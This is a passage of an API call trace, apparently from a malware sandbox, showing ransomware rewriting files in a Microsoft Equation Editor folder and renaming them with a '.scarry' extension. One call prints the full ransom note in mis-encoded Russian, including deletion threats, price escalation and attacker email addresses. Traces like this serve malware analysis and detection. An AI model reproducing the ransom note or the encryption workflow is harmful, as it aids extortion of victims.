(hMem=0x450004) returned 0x591988 [0108.374] GlobalHandle (pMem=0x591988) returned 0x450004 [0108.374] GlobalUnlock (hMem=0x450004) returned 0 [0108.374] GlobalLock (hMem=0x450004) returned 0x591988 [0108.374] GlobalLock (hMem=0x45000c) returned 0x593998 [0108.374] GlobalHandle (pMem=0x591988) returned 0x450004 [0108.374] GlobalUnlock (hMem=0x450004) returned 0 [0108.374] GlobalHandle (pMem=0x593998) returned 0x45000c [0108.374] GlobalUnlock (hMem=0x45000c) returned 0 [0108.374] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, 
lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0108.375] CharLowerBuffW (in: lpsz="EQNEDT32.HLP", cchLength=0xc | out: lpsz="eqnedt32.hlp") returned 0xc [0108.375] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pí\x18", lpUsedDefaultChar=0x0) returned 1 [0108.375] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lí\x18", lpUsedDefaultChar=0x0) returned 1 [0108.375] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="h", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hí\x18", lpUsedDefaultChar=0x0) returned 1 [0108.375] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".í\x18", lpUsedDefaultChar=0x0) returned 1 [0108.375] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2í\x18", lpUsedDefaultChar=0x0) returned 1 [0108.375] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3í\x18", lpUsedDefaultChar=0x0) returned 1 [0108.375] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tí\x18", lpUsedDefaultChar=0x0) returned 1 [0108.375] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", 
cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dí\x18", lpUsedDefaultChar=0x0) returned 1 [0108.375] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eí\x18", lpUsedDefaultChar=0x0) returned 1 [0108.375] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ní\x18", lpUsedDefaultChar=0x0) returned 1 [0108.375] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="qí\x18", lpUsedDefaultChar=0x0) returned 1 [0108.375] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eí\x18", lpUsedDefaultChar=0x0) returned 1 [0108.375] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=36, lpWideCharStr=0x18dd64, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txtXT\x18\x03") returned 36 [0108.376] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP", cchWideChar=68, lpMultiByteStr=0x18dd40, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLPñ", lpUsedDefaultChar=0x0) returned 68 [0108.376] CharLowerBuffW (in: lpsz=".HLP", cchLength=0x4 | out: lpsz=".hlp") returned 0x4 [0108.376] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".hlp", cchWideChar=4, 
lpMultiByteStr=0x18dd64, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".hlpShared\\EQUATION\\EQNEDT32.HLPñ", lpUsedDefaultChar=0x0) returned 4 [0108.376] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP", lpFindFileData=0x18eb04 | out: lpFindFileData=0x18eb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bd0200, ftCreationTime.dwHighDateTime=0x1be1298, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x3bd0200, ftLastWriteTime.dwHighDateTime=0x1be1298, nFileSizeHigh=0x0, nFileSizeLow=0x2b0b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQNEDT32.HLP", cAlternateFileName="")) returned 0x58b060 [0108.376] FileTimeToLocalFileTime (in: lpFileTime=0x18eb18, lpLocalFileTime=0x18ea30 | out: lpLocalFileTime=0x18ea30) returned 1 [0108.376] FileTimeToDosDateTime (in: lpFileTime=0x18ea30, lpFatDate=0x18eae6, lpFatTime=0x18eae4 | out: lpFatDate=0x18eae6, lpFatTime=0x18eae4) returned 1 [0108.376] FindClose (in: hFindFile=0x58b060 | out: hFindFile=0x58b060) returned 1 [0108.377] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP", dwFileAttributes=0x20) returned 1 [0108.377] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0108.377] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x0 [0108.377] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x2b0b7 
[0108.378] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x0 [0108.378] ReadFile (in: hFile=0x1a4, lpBuffer=0x1e79f08, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x18ea34, lpOverlapped=0x0 | out: lpBuffer=0x1e79f08*, lpNumberOfBytesRead=0x18ea34*=0x4000, lpOverlapped=0x0) returned 1 [0108.526] GlobalLock (hMem=0x45000c) returned 0x591988 [0108.526] GlobalLock (hMem=0x450004) returned 0x597998 [0108.527] GlobalHandle (pMem=0x597998) returned 0x450004 [0108.527] GlobalUnlock (hMem=0x450004) returned 0 [0108.527] GlobalReAlloc (hMem=0x450004, dwBytes=0x4000, uFlags=0x2) returned 0x450004 [0108.527] GlobalLock (hMem=0x450004) returned 0x5999a8 [0108.528] GlobalHandle (pMem=0x5999a8) returned 0x450004 [0108.528] GlobalUnlock (hMem=0x450004) returned 0 [0108.528] GlobalReAlloc (hMem=0x450004, dwBytes=0x6000, uFlags=0x2) returned 0x450004 [0108.528] GlobalLock (hMem=0x450004) returned 0x59d9b8 [0108.528] GlobalHandle (pMem=0x591988) returned 0x45000c [0108.528] GlobalUnlock (hMem=0x45000c) returned 0 [0108.528] GlobalHandle (pMem=0x59d9b8) returned 0x450004 [0108.528] GlobalUnlock (hMem=0x450004) returned 0 [0108.528] GlobalLock (hMem=0x450004) returned 0x591988 [0108.528] GlobalHandle (pMem=0x591988) returned 0x450004 [0108.528] GlobalUnlock (hMem=0x450004) returned 0 [0108.528] GlobalReAlloc (hMem=0x450004, dwBytes=0x6000, uFlags=0x2) returned 0x450004 [0108.528] GlobalLock (hMem=0x450004) returned 0x591988 [0108.528] GlobalHandle (pMem=0x591988) returned 0x450004 [0108.529] GlobalUnlock (hMem=0x450004) returned 0 [0108.529] ReadFile (in: hFile=0x1a4, lpBuffer=0x1e4d2c0, nNumberOfBytesToRead=0x18, lpNumberOfBytesRead=0x18ea34, lpOverlapped=0x0 | out: lpBuffer=0x1e4d2c0*, lpNumberOfBytesRead=0x18ea34*=0x18, lpOverlapped=0x0) returned 1 [0108.530] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea28*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x18ea28*=0) returned 0x0 [0108.530] WriteFile (in: hFile=0x1a4, lpBuffer=0x1e79f08*, nNumberOfBytesToWrite=0x4018, lpNumberOfBytesWritten=0x18ea30, lpOverlapped=0x0 | out: lpBuffer=0x1e79f08*, lpNumberOfBytesWritten=0x18ea30*=0x4018, lpOverlapped=0x0) returned 1 [0108.530] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=176311, lpDistanceToMoveHigh=0x18ea28*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ea28*=0) returned 0x2b0b7 [0108.530] WriteFile (in: hFile=0x1a4, lpBuffer=0x1e4d2c0*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x18ea30, lpOverlapped=0x0 | out: lpBuffer=0x1e4d2c0*, lpNumberOfBytesWritten=0x18ea30*=0x18, lpOverlapped=0x0) returned 1 [0108.530] WriteFile (in: hFile=0x1a4, lpBuffer=0x18eaac*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x18ea30, lpOverlapped=0x0 | out: lpBuffer=0x18eaac*, lpNumberOfBytesWritten=0x18ea30*=0x8, lpOverlapped=0x0) returned 1 [0108.530] WriteFile (in: hFile=0x1a4, lpBuffer=0x1ea1d48*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x18ea30, lpOverlapped=0x0 | out: lpBuffer=0x1ea1d48*, lpNumberOfBytesWritten=0x18ea30*=0x1, lpOverlapped=0x0) returned 1 [0108.685] WriteFile (in: hFile=0x1a4, lpBuffer=0x1e79f28*, nNumberOfBytesToWrite=0x9c, lpNumberOfBytesWritten=0x18ea30, lpOverlapped=0x0 | out: lpBuffer=0x1e79f28*, lpNumberOfBytesWritten=0x18ea30*=0x9c, lpOverlapped=0x0) returned 1 [0108.685] CloseHandle (hObject=0x1a4) returned 1 [0108.725] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e7e018, cbMultiByte=39, lpWideCharStr=0x18da40, cchWideChar=2047 | out: lpWideCharStr="n9CDsSozE+uvBcVYS53KG0M5M9esrutb.scarry=GSpuRTe9BYpCgPmO.scarry") returned 39 [0108.725] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft 
Shared\\EQUATION\\n9CDsSozE+uvBcVYS53KG0M5M9esrutb.scarry" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\n9cdssoze+uvbcvys53kg0m5m9esrutb.scarry")) returned 1 [0108.726] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\n9CDsSozE+uvBcVYS53KG0M5M9esrutb.scarry" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\n9cdssoze+uvbcvys53kg0m5m9esrutb.scarry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0108.726] SetFileTime (hFile=0x1a4, lpCreationTime=0x18ead0, lpLastAccessTime=0x18eac8, lpLastWriteTime=0x18eac0) returned 1 [0108.726] CloseHandle (hObject=0x1a4) returned 1 [0108.726] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\n9CDsSozE+uvBcVYS53KG0M5M9esrutb.scarry", dwFileAttributes=0x20) returned 1 [0108.727] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ab98, cbMultiByte=36, lpWideCharStr=0x18dd68, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT\x18\x03") returned 36 [0108.727] GlobalLock (hMem=0x450004) returned 0x591988 [0108.727] GlobalHandle (pMem=0x591988) returned 0x450004 [0108.727] GlobalUnlock (hMem=0x450004) returned 0 [0108.727] GlobalLock (hMem=0x450004) returned 0x591988 [0108.727] GlobalLock (hMem=0x45000c) returned 0x593998 [0108.727] GlobalHandle (pMem=0x591988) returned 0x450004 [0108.727] GlobalUnlock (hMem=0x450004) returned 0 [0108.727] GlobalHandle (pMem=0x593998) returned 0x45000c [0108.727] GlobalUnlock (hMem=0x45000c) returned 0 [0108.727] CompareStringA (Locale=0x400, dwCmpFlags=0x0, lpString1="{{IDENTIFIER}}\r\n\r\nÂàøè äîêóìåíòû, ôîòîãðàôèè, áàçû äàííûõ è äðóãèå âàæíûå ôàéëû áûëè çàøèôðîâàíû. 
\r\nÊàæäûå 24 ÷àñà óäàëÿþòñÿ 24 ôàéëà, íåîáõîäèìî ïðèñëàòü ñâîé èäåíòèôèêàòîð ÷òîá ìû îòêëþ÷èëè ýòó ôóíêöèþ.\r\nÊàæäûå 24 ÷àñà ñòîèìîñòü ðàñøèôðîâêè äàííûõ óâåëè÷èâàåòñÿ íà 30% (÷åðåç 72 ÷àñà ñóììà ôèêñèðóåòñÿ)\r\n\r\nÄëÿ ðàñøèôðîâêè äàííûõ:\r\n\r\nÍàïèøèòå íà ïî÷òó - scarry38@horsefucker.org\r\n \r\n * ïèñüìå óêàçàòü Âàø ëè÷íûé èäåíòèôèêàòîð\r\n *Ïðèêðåïèòå 2 ôàéëà äî 1 ìá äëÿ òåñòîâîé ðàñøèôðîâêè. \r\n ìû èõ ðàñøèôðóåì, â êà÷åñòâå äîêàçàòåëüñòâà, ÷òî ÒÎËÜÊÎ ÌÛ ìîæåì ðàñøèôðîâàòü ôàéëû.\r\n\r\nÂÀÆÍÎ! Íå ïèøèòå ñ mail.ru (ê íàì íå äîõîäÿò ïèüñìà) Èñïîëüçóéòå - yandex.ru gmail.com è ò.ä. \r\nÂñå êðîìå mail.ru\r\n\r\n -×åì áûñòðåå âû ñîîáùèòå íàì ñâîé èäåíòèôèêàòîð, òåì áûñòðåå ìû âûêëþ÷èì ïðîèçâîëüíîå óäàëåíèå ôàéëîâ.\r\n -Íàïèñàâ íàì íà ïî÷òó âû ïîëó÷èòå äàëüíåéøèå èíñòðóêöèè ïî îïëàòå.\r\n\r\n îòâåòíîì ïèñüìå Âû ïîëó÷èòå ïðîãðàììó äëÿ ðàñøèôðîâêè.\r\nÏîñëå çàïóñêà ïðîãðàììû-äåøèôðîâùèêà âñå Âàøè ôàéëû áóäóò âîññòàíîâëåíû.\r\n\r\nÌû ãàðàíòèðóåì:\r\n100% óñïåøíîå âîññòàíîâëåíèå âñåõ âàøèõ ôàéëîâ\r\n100% ãàðàíòèþ ñîîòâåòñòâèÿ\r\n100% áåçîïàñíûé è íàäåæíûé ñåðâèñ\r\n\r\nÂíèìàíèå!\r\n * Íå ïûòàéòåñü óäàëèòü ïðîãðàììó èëè çàïóñêàòü àíòèâèðóñíûå ñðåäñòâà\r\n * Ïîïûòêè ñàìîñòîÿòåëüíîé ðàñøèôðîâêè ôàéëîâ ïðèâåäóò ê ïîòåðå Âàøèõ äàííûõ\r\n * Äåøèôðàòîðû äðóãèõ ïîëüçîâàòåëåé íåñîâìåñòèìû ñ Âàøèìè äàííûìè, òàê êàê ó êàæäîãî ïîëüçîâàòåëÿ\r\nóíèêàëüíûé êëþ÷ øèôðîâàíèÿ\r\n\r\n Åñëè âàì íå îòâåòèëè â òå÷åíèè 24õ ÷àñîâ, ïèøèòå íà ðåçåðâíóþ ïî÷òó - black8201@protonmail.com\r\n====================================================================================================\r\n\r\nÂàø ëè÷íûé èäåíòèôèêàòîð\r\n\r\n{{IDENTIFIER}}", cchCount1=14, lpString2="{{IDENTIFIER}}", cchCount2=14) returned 2 [0108.727] CompareStringA (Locale=0x400, dwCmpFlags=0x0, lpString1="{{IDENTIFIER}}", cchCount1=14, lpString2="{{IDENTIFIER}}", cchCount2=14) returned 2 [0108.728] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Èíñòðóêöèÿ ïî ðàñøèôðîâêå 
ôàéëîâ.TXT", lpFindFileData=0x18eb1c | out: lpFindFileData=0x18eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd8d32a0, ftCreationTime.dwHighDateTime=0x1d61645, ftLastAccessTime.dwLowDateTime=0xfd8d32a0, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0xfd8d32a0, ftLastWriteTime.dwHighDateTime=0x1d61645, nFileSizeHigh=0x0, nFileSizeLow=0xdf9, dwReserved0=0xe80020c8, dwReserved1=0x402, cFileName="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT", cAlternateFileName="D407~1.TXT")) returned 0x58b060 [0108.728] FileTimeToLocalFileTime (in: lpFileTime=0x18eb30, lpLocalFileTime=0x18eab0 | out: lpLocalFileTime=0x18eab0) returned 1 [0108.728] FileTimeToDosDateTime (in: lpFileTime=0x18eab0, lpFatDate=0x18eafe, lpFatTime=0x18eafc | out: lpFatDate=0x18eafe, lpFatTime=0x18eafc) returned 1 [0108.728] FindClose (in: hFindFile=0x58b060 | out: hFindFile=0x58b060) returned 1 [0108.728] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0108.728] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0x0 [0108.728] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0xdf9 [0108.728] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0x0 [0108.728] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0x0 [0108.728] 
SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0xdf9 [0108.728] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0x0 [0108.728] ReadFile (in: hFile=0x1a4, lpBuffer=0x1e7ad38, nNumberOfBytesToRead=0xdf9, lpNumberOfBytesRead=0x18ed28, lpOverlapped=0x0 | out: lpBuffer=0x1e7ad38*, lpNumberOfBytesRead=0x18ed28*=0xdf9, lpOverlapped=0x0) returned 1 [0108.728] CloseHandle (hObject=0x1a4) returned 1 [0108.729] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95fd7600, ftCreationTime.dwHighDateTime=0x1bc9dc7, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x95fd7600, ftLastWriteTime.dwHighDateTime=0x1bc9dc7, nFileSizeHigh=0x0, nFileSizeLow=0x1de8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MTEXTRA.TTF", cAlternateFileName="")) returned 1 [0108.729] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0108.729] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0108.729] GlobalLock (hMem=0x45000c) returned 0x591988 [0108.729] GlobalHandle (pMem=0x591988) returned 0x45000c [0108.729] GlobalUnlock (hMem=0x45000c) returned 0 [0108.729] GlobalLock (hMem=0x45000c) returned 0x591988 [0108.729] GlobalLock (hMem=0x450004) returned 0x593998 [0108.729] GlobalHandle (pMem=0x591988) returned 0x45000c [0108.729] GlobalUnlock (hMem=0x45000c) returned 0 [0108.729] GlobalHandle (pMem=0x593998) returned 0x450004 [0108.729] GlobalUnlock (hMem=0x450004) returned 0 [0108.729] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, 
lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0108.730] CharLowerBuffW (in: lpsz="MTEXTRA.TTF", cchLength=0xb | out: lpsz="mtextra.ttf") returned 0xb [0108.730] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fí\x18", lpUsedDefaultChar=0x0) returned 1 [0108.730] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tí\x18", lpUsedDefaultChar=0x0) returned 1 [0108.730] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tí\x18", lpUsedDefaultChar=0x0) returned 1 [0108.730] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".í\x18", lpUsedDefaultChar=0x0) returned 1 [0108.730] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aí\x18", lpUsedDefaultChar=0x0) returned 1 [0108.730] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rí\x18", lpUsedDefaultChar=0x0) returned 1 [0108.730] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tí\x18", lpUsedDefaultChar=0x0) returned 1 [0108.730] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="x", 
cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="xí\x18", lpUsedDefaultChar=0x0) returned 1 [0108.730] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eí\x18", lpUsedDefaultChar=0x0) returned 1 [0108.730] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tí\x18", lpUsedDefaultChar=0x0) returned 1 [0108.730] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mí\x18", lpUsedDefaultChar=0x0) returned 1 [0108.730] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ace8, cbMultiByte=36, lpWideCharStr=0x18dd64, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txtXT\x18\x03") returned 36 [0108.730] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF", cchWideChar=67, lpMultiByteStr=0x18dd40, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF", lpUsedDefaultChar=0x0) returned 67 [0108.730] CharLowerBuffW (in: lpsz=".TTF", cchLength=0x4 | out: lpsz=".ttf") returned 0x4 [0108.730] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".ttf", cchWideChar=4, lpMultiByteStr=0x18dd64, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".ttfShared\\EQUATION\\MTEXTRA.TTF", lpUsedDefaultChar=0x0) returned 4 [0108.731] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft 
Shared\\EQUATION\\MTEXTRA.TTF", lpFindFileData=0x18eb04 | out: lpFindFileData=0x18eb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95fd7600, ftCreationTime.dwHighDateTime=0x1bc9dc7, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x95fd7600, ftLastWriteTime.dwHighDateTime=0x1bc9dc7, nFileSizeHigh=0x0, nFileSizeLow=0x1de8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MTEXTRA.TTF", cAlternateFileName="")) returned 0x58b060 [0108.731] FileTimeToLocalFileTime (in: lpFileTime=0x18eb18, lpLocalFileTime=0x18ea30 | out: lpLocalFileTime=0x18ea30) returned 1 [0108.731] FileTimeToDosDateTime (in: lpFileTime=0x18ea30, lpFatDate=0x18eae6, lpFatTime=0x18eae4 | out: lpFatDate=0x18eae6, lpFatTime=0x18eae4) returned 1 [0108.731] FindClose (in: hFindFile=0x58b060 | out: hFindFile=0x58b060) returned 1 [0108.731] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF", dwFileAttributes=0x20) returned 1 [0108.731] CreateFileW 